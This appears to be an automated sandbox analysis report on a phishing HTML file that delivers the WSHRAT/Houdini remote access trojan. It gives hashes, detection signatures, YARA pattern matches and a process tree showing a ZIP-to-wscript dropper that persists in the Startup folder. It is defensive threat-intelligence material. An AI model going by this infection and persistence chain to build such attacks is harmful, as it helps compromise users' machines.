Edit tour

Windows Analysis Report
Voicemail Jud.html

Overview

General Information

Sample name:	Voicemail Jud.html
Analysis ID:	1439837
MD5:	3d9479b1e6201aa32a6b812f02482b38
SHA1:	5c595ea2e25dd799e11a31e7df0d5744de21ff58
SHA256:	427fb9938ca75db1a362fe51356a1dc06350daa5f9db788a4ca2f7e2cb21fd34
Infos:

Detection

WSHRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Sigma detected: Register Wscript In Run Key

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected WSHRAT

Blob-based file download detected

Connects to a pastebin service (likely for C&C)

Contains VNC / remote desktop functionality (version string found)

Downloads suspicious files via Chrome

Drops script or batch files to the startup folder

Found suspicious ZIP file

HTML document with suspicious name

HTML document with suspicious title

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: WScript or CScript Dropper - File

Suspicious execution chain found

Uses dynamic DNS services

Uses known network protocols on non-standard ports

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript called in batch mode (surpress errors)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to query the security center for anti-virus and firewall products

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Found WSH timer for Javascript or VBS script (likely evasive script)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

chrome.exe (PID: 4948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Voicemail Jud.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2292,i,17443918596644864279,4892845659542734896,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

unarchiver.exe (PID: 6944 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)

7za.exe (PID: 2936 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\2otik2vy.ast" "C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)

conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6952 cmdline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 7076 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" MD5: FF00E0480075B095948000BDC66E81F0)

wscript.exe (PID: 1544 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js" MD5: FF00E0480075B095948000BDC66E81F0)

wscript.exe (PID: 7100 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 6008 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 6964 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 6936 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\New Voicemail May 9 _mp4.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Houdini, WSHRAT	Houdini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.	No Attribution	http://blog.morphisec.com/hworm-houdini-aka-njrat http://blogs.360.cn/post/analysis-of-apt-c-37.html https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x96654:$ex: .ExecQuery( 0x96e8f:$ex: .ExecQuery( 0x96fc7:$ex: .ExecQuery( 0x97120:$ex: .ExecQuery( 0x999d0:$ex: .ExecQuery( 0x95eff:$s1: GetObject( 0x96633:$s1: GetObject( 0x96e6e:$s1: GetObject( 0x96fa8:$s1: GetObject( 0x970fb:$s1: GetObject( 0x999b1:$s1: GetObject( 0x97c58:$s2: String.fromCharCode( 0x9972b:$s2: String.fromCharCode( 0x99752:$s2: String.fromCharCode( 0x9a03f:$s2: String.fromCharCode( 0x9a078:$s2: String.fromCharCode( 0x92fed:$s3: ActiveXObject( 0x934f9:$s3: ActiveXObject( 0x94d8f:$s4: .sleep( 0x95455:$s4: .sleep( 0x96883:$s4: .sleep(
C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x96654:$ex: .ExecQuery( 0x96e8f:$ex: .ExecQuery( 0x96fc7:$ex: .ExecQuery( 0x97120:$ex: .ExecQuery( 0x999d0:$ex: .ExecQuery( 0x95eff:$s1: GetObject( 0x96633:$s1: GetObject( 0x96e6e:$s1: GetObject( 0x96fa8:$s1: GetObject( 0x970fb:$s1: GetObject( 0x999b1:$s1: GetObject( 0x97c58:$s2: String.fromCharCode( 0x9972b:$s2: String.fromCharCode( 0x99752:$s2: String.fromCharCode( 0x9a03f:$s2: String.fromCharCode( 0x9a078:$s2: String.fromCharCode( 0x92fed:$s3: ActiveXObject( 0x934f9:$s3: ActiveXObject( 0x94d8f:$s4: .sleep( 0x95455:$s4: .sleep( 0x96883:$s4: .sleep(
C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x96654:$ex: .ExecQuery( 0x96e8f:$ex: .ExecQuery( 0x96fc7:$ex: .ExecQuery( 0x97120:$ex: .ExecQuery( 0x999d0:$ex: .ExecQuery( 0x95eff:$s1: GetObject( 0x96633:$s1: GetObject( 0x96e6e:$s1: GetObject( 0x96fa8:$s1: GetObject( 0x970fb:$s1: GetObject( 0x999b1:$s1: GetObject( 0x97c58:$s2: String.fromCharCode( 0x9972b:$s2: String.fromCharCode( 0x99752:$s2: String.fromCharCode( 0x9a03f:$s2: String.fromCharCode( 0x9a078:$s2: String.fromCharCode( 0x92fed:$s3: ActiveXObject( 0x934f9:$s3: ActiveXObject( 0x94d8f:$s4: .sleep( 0x95455:$s4: .sleep( 0x96883:$s4: .sleep(
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000003.2053554395.0000000003517000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2093975107.00000000038A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000B.00000003.2092992601.00000000052A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2197255789.0000000006CBD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000011.00000003.2443802427.000002101330E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2776254293.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2776254293.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
0000000C.00000002.3662166348.00000000059A3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2252696295.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2252696295.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
00000011.00000002.3662453793.00000210132F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000007.00000003.2039075098.0000000000E00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000007.00000003.2039075098.0000000000E00000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x19d0:$ex: .ExecQuery( 0x6654:$ex: .ExecQuery( 0x6e8f:$ex: .ExecQuery( 0x6fc7:$ex: .ExecQuery( 0x7120:$ex: .ExecQuery( 0x19b1:$s1: GetObject( 0x5eff:$s1: GetObject( 0x6633:$s1: GetObject( 0x6e6e:$s1: GetObject( 0x6fa8:$s1: GetObject( 0x70fb:$s1: GetObject( 0x172b:$s2: String.fromCharCode( 0x1752:$s2: String.fromCharCode( 0x203f:$s2: String.fromCharCode( 0x2078:$s2: String.fromCharCode( 0x7c58:$s2: String.fromCharCode( 0x2fed:$s3: ActiveXObject( 0x34f9:$s3: ActiveXObject( 0x667:$s4: .sleep( 0x6ae:$s4: .sleep( 0x17d8:$s4: .sleep(
0000000C.00000003.2092554619.0000000005A54000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000B.00000003.2094186218.000000000573C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000011.00000003.2443649511.00000210131BF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000B.00000003.2047460205.0000000005727000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000002.3662373093.0000000005AEC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2365561540.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2365561540.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
00000011.00000003.2444885075.00000210130B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000011.00000002.3662263359.00000210131BA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000011.00000002.3662635567.00000210134D5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.3283310659.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.3283310659.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
00000011.00000002.3663724443.000002101409B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2092891218.0000000005B96000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.3228165832.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.3228165832.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
0000000C.00000003.2122982130.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2122982130.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x15c4c:$ex: .ExecQuery( 0x16487:$ex: .ExecQuery( 0x165bf:$ex: .ExecQuery( 0x16718:$ex: .ExecQuery( 0x18fc8:$ex: .ExecQuery( 0x154f7:$s1: GetObject( 0x15c2b:$s1: GetObject( 0x16466:$s1: GetObject( 0x165a0:$s1: GetObject( 0x166f3:$s1: GetObject( 0x18fa9:$s1: GetObject( 0x17250:$s2: String.fromCharCode( 0x18d23:$s2: String.fromCharCode( 0x18d4a:$s2: String.fromCharCode( 0x19637:$s2: String.fromCharCode( 0x19670:$s2: String.fromCharCode( 0x125e5:$s3: ActiveXObject( 0x12af1:$s3: ActiveXObject( 0x14387:$s4: .sleep( 0x14a4d:$s4: .sleep( 0x15e7b:$s4: .sleep(
0000000B.00000003.2091678833.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000B.00000003.2091678833.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
00000011.00000002.3661879810.0000021012F6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2195388309.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2195388309.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
0000000C.00000002.3662661142.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000002.3664293608.0000000006F10000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000002.3664293608.0000000006F10000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1669c:$ex: .ExecQuery( 0x16ed7:$ex: .ExecQuery( 0x1700f:$ex: .ExecQuery( 0x17168:$ex: .ExecQuery( 0x19a18:$ex: .ExecQuery( 0x15f47:$s1: GetObject( 0x1667b:$s1: GetObject( 0x16eb6:$s1: GetObject( 0x16ff0:$s1: GetObject( 0x17143:$s1: GetObject( 0x199f9:$s1: GetObject( 0x17ca0:$s2: String.fromCharCode( 0x19773:$s2: String.fromCharCode( 0x1979a:$s2: String.fromCharCode( 0x1a087:$s2: String.fromCharCode( 0x1a0c0:$s2: String.fromCharCode( 0x13035:$s3: ActiveXObject( 0x13541:$s3: ActiveXObject( 0x14dd7:$s4: .sleep( 0x1549d:$s4: .sleep( 0x168cb:$s4: .sleep(
0000000C.00000003.3338153980.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.3338153980.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
0000000B.00000003.2089734091.0000000006A73000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000B.00000003.2089734091.0000000006A73000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x15b44:$ex: .ExecQuery( 0x1637f:$ex: .ExecQuery( 0x164b7:$ex: .ExecQuery( 0x16610:$ex: .ExecQuery( 0x18ec0:$ex: .ExecQuery( 0x153ef:$s1: GetObject( 0x15b23:$s1: GetObject( 0x1635e:$s1: GetObject( 0x16498:$s1: GetObject( 0x165eb:$s1: GetObject( 0x18ea1:$s1: GetObject( 0x17148:$s2: String.fromCharCode( 0x18c1b:$s2: String.fromCharCode( 0x18c42:$s2: String.fromCharCode( 0x1952f:$s2: String.fromCharCode( 0x19568:$s2: String.fromCharCode( 0x124dd:$s3: ActiveXObject( 0x129e9:$s3: ActiveXObject( 0x1427f:$s4: .sleep( 0x14945:$s4: .sleep( 0x15d73:$s4: .sleep(
0000000C.00000003.2309211314.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2309211314.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
0000000B.00000003.2044961577.00000000055E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000B.00000003.2092865617.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000002.3661927957.000000000562A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000B.00000003.2093146388.00000000055ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2479670966.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2479670966.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
0000000C.00000003.3408776876.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.3408776876.0000000006F11000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x1569c:$ex: .ExecQuery( 0x15ed7:$ex: .ExecQuery( 0x1600f:$ex: .ExecQuery( 0x16168:$ex: .ExecQuery( 0x18a18:$ex: .ExecQuery( 0x14f47:$s1: GetObject( 0x1567b:$s1: GetObject( 0x15eb6:$s1: GetObject( 0x15ff0:$s1: GetObject( 0x16143:$s1: GetObject( 0x189f9:$s1: GetObject( 0x16ca0:$s2: String.fromCharCode( 0x18773:$s2: String.fromCharCode( 0x1879a:$s2: String.fromCharCode( 0x19087:$s2: String.fromCharCode( 0x190c0:$s2: String.fromCharCode( 0x12035:$s3: ActiveXObject( 0x12541:$s3: ActiveXObject( 0x13dd7:$s4: .sleep( 0x1449d:$s4: .sleep( 0x158cb:$s4: .sleep(
00000011.00000003.2444105297.00000210130F7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
